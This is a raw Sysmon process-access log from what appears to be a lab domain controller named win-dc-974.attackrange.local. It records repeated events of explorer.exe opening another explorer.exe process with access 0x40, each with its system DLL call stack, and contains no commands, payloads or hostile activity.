16:56:29.641{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244323Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.641{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244322Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.641{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244321Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.641{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244320Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.641{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244319Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.641{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244318Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244317Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244316Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244315Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244314Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244313Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244312Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244311Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.640{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244310Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244309Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244308Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244307Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244306Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244305Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244304Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244303Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244302Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244301Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244300Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244299Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244298Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244297Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244296Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 